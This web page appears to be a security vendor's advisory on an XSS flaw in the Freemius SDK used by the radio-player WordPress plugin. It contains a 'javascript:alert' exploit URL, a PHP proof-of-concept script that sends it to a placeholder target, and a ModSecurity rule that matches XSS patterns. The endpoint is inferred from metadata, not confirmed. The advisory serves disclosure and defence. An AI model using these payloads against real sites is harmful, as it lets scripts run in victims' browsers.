What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK in versions 2.10.1 and earlier. It allows attackers to inject arbitrary JavaScript via the ‘url’ parameter, which can execute in the victim’s browser if they click a malicious link.

How does this vulnerability work?

The vulnerability exploits insufficient input sanitization and output escaping in the handling of the ‘url’ parameter. An attacker can craft a URL containing a malicious payload, and when a user clicks the link, the injected script runs in their browser context, potentially leading to session hijacking or data theft.

Who is affected by this vulnerability?

WordPress sites using the Freemius SDK version 2.10.1 or earlier, particularly those with the radio-player plugin version 2.0.82 or earlier, are affected. Administrators should check their plugin versions to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the radio-player plugin and the Freemius SDK in use. If your version is 2.10.1 or earlier, you are at risk. Additionally, review your site’s code for the handling of the ‘url’ parameter in the relevant plugin files.

What is the recommended fix for this vulnerability?

The primary fix involves implementing proper input sanitization and output escaping for the ‘url’ parameter. Developers should use WordPress functions like esc_url() or wp_kses() to validate and escape the parameter before rendering it in the DOM.

What does the CVSS score of 6.1 indicate?

A CVSS score of 6.1 is classified as medium severity, indicating that while the vulnerability is not trivial to exploit, it can lead to significant consequences if successfully executed. This means that administrators should prioritize remediation to protect users and data.

What are the potential impacts of this vulnerability?

Exploitation can allow attackers to execute arbitrary JavaScript in a victim’s browser, leading to risks such as session hijacking, data theft, and phishing attacks. Since the attack requires user interaction, it is critical to educate users about the risks of clicking untrusted links.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can construct a malicious URL that exploits the vulnerability. By simulating a user clicking the crafted link, it shows how the injected JavaScript can execute in the browser, confirming the presence of the XSS vulnerability.

Is user authentication required to exploit this vulnerability?

No prior authentication is required to exploit this vulnerability. An attacker only needs to trick a user into clicking a malicious link, which makes it particularly dangerous as it can target any unauthenticated user visiting the site.

What should I do if I am unable to fix the vulnerability immediately?

If immediate remediation is not possible, consider disabling the affected plugin until a fix can be applied. Additionally, inform users to avoid clicking on suspicious links and monitor your site for any unusual activity.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database and security advisories related to the Freemius SDK and the radio-player plugin. Keeping abreast of updates from WordPress security sources is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (radio-player)

CVE ID CVE-2024-13362

Plugin radio-player

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.0.82

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This vulnerability is a Reflected DOM-Based Cross-Site Scripting (XSS) present in the Freemius SDK (version <= 2.10.1) and specifically affects the radio-player plugin (version <= 2.0.82). An unauthenticated attacker can inject arbitrary JavaScript through the 'url' parameter. The CVSS score is 6.1 (Medium) with a vector of AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N.

Root Cause: The CWE-79 classification and description indicate improper neutralization of input during web page generation. The vulnerability likely stems from the Freemius SDK's handling of the 'url' parameter, which is used to generate links or redirects. Insufficient input sanitization and output escaping allow an attacker to inject malicious JavaScript code that executes in the browser's DOM context. This conclusion is inferred from the CWE and description; no code diff confirms the exact flawed function.

Exploitation: An attacker crafts a URL containing a malicious payload in the 'url' parameter. For example, a link to the vulnerable endpoint might look like: https://target-site/wp-content/plugins/radio-player/freemius/start.php?url=javascript:alert(1). When a victim clicks the link, the injected script executes in their browser session. The attack requires user interaction (clicking) but no prior authentication.

Remediation: The fix requires proper input sanitization and output escaping of the 'url' parameter. Developers should use WordPress built-in functions like esc_url() or wp_kses() to validate and escape the parameter before rendering it in the DOM. A strict allowlist of permitted URL schemes (e.g., http, https) and character restrictions would prevent script injection.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser. This can lead to session hijacking, data theft, defacement, or phishing attacks. Since the vulnerability is reflected, the attacker must trick users into clicking a malicious link.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected XSS via the url parameter in the Freemius SDK (radio-player plugin)
# Target: /wp-content/plugins/radio-player/freemius/start.php with malicious url parameter

SecRule REQUEST_URI "@rx /wp-content/plugins/radio-player/freemius/start.php$" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 XSS via url parameter in Freemius',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_GET:url "@rx (?:javascript:|<script|onw+=|&#|%3C|%3E)" 
    "t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php

// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

/*
 * Assumptions:
 *   - The vulnerable endpoint is /wp-content/plugins/radio-player/freemius/start.php
 *   - The 'url' parameter is not sanitized and is reflected into JavaScript context
 *   - All URLs must be accessible; if the site uses a custom prefix, adjust $target_url
 */

$target_url = 'http://target-site.com/wp-content/plugins/radio-player/freemius/start.php';

// Construct the malicious payload (URL-encoded XSS)
$payload = 'javascript:alert("Atomic Edge PoC - XSS")';
$malicious_url = $target_url . '?url=' . urlencode($payload);

echo "[+] Exploit URL:n";
echo $malicious_url . "nn";
echo "[+] Sending request to test delivery...n";

// Use cURL to send a request and check the response (simulates user clicking)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Status: " . $http_code . "n";

// Check if the payload appears in the response (partial validation)
if (strpos($response, 'javascript:alert("Atomic Edge PoC - XSS")') !== false) {
    echo "[+] PAYLOAD FOUND in response! Vulnerability is present.n";
} else {
    echo "[-] Payload not detected in response. This may not be the correct endpoint or the parameter name differs.n";
    echo "[-] Saving raw response to debug.txt for manual inspection.n";
    file_put_contents('debug.txt', $response);
}

echo "n[+] Done.n";

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK in versions 2.10.1 and earlier. It allows attackers to inject arbitrary JavaScript via the ‘url’ parameter, which can execute in the victim’s browser if they click a malicious link.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exploits insufficient input sanitization and output escaping in the handling of the ‘url’ parameter. An attacker can craft a URL containing a malicious payload, and when a user clicks the link, the injected script runs in their browser context, potentially leading to session hijacking or data theft.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress sites using the Freemius SDK version 2.10.1 or earlier, particularly those with the radio-player plugin version 2.0.82 or earlier, are affected. Administrators should check their plugin versions to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the radio-player plugin and the Freemius SDK in use. If your version is 2.10.1 or earlier, you are at risk. Additionally, review your site’s code for the handling of the ‘url’ parameter in the relevant plugin files.
What is the recommended fix for this vulnerability?
Mitigation steps
The primary fix involves implementing proper input sanitization and output escaping for the ‘url’ parameter. Developers should use WordPress functions like esc_url() or wp_kses() to validate and escape the parameter before rendering it in the DOM.
What does the CVSS score of 6.1 indicate?
Understanding the risk level
A CVSS score of 6.1 is classified as medium severity, indicating that while the vulnerability is not trivial to exploit, it can lead to significant consequences if successfully executed. This means that administrators should prioritize remediation to protect users and data.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Exploitation can allow attackers to execute arbitrary JavaScript in a victim’s browser, leading to risks such as session hijacking, data theft, and phishing attacks. Since the attack requires user interaction, it is critical to educate users about the risks of clicking untrusted links.
How does the proof of concept demonstrate the vulnerability?
Exploit demonstration
The proof of concept provided illustrates how an attacker can construct a malicious URL that exploits the vulnerability. By simulating a user clicking the crafted link, it shows how the injected JavaScript can execute in the browser, confirming the presence of the XSS vulnerability.
Is user authentication required to exploit this vulnerability?
User interaction needed
No prior authentication is required to exploit this vulnerability. An attacker only needs to trick a user into clicking a malicious link, which makes it particularly dangerous as it can target any unauthenticated user visiting the site.
What should I do if I am unable to fix the vulnerability immediately?
Interim measures
If immediate remediation is not possible, consider disabling the affected plugin until a fix can be applied. Additionally, inform users to avoid clicking on suspicious links and monitor your site for any unusual activity.
Where can I find more information about this vulnerability?
Additional resources
More information can be found in the official CVE database and security advisories related to the Freemius SDK and the radio-player plugin. Keeping abreast of updates from WordPress security sources is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations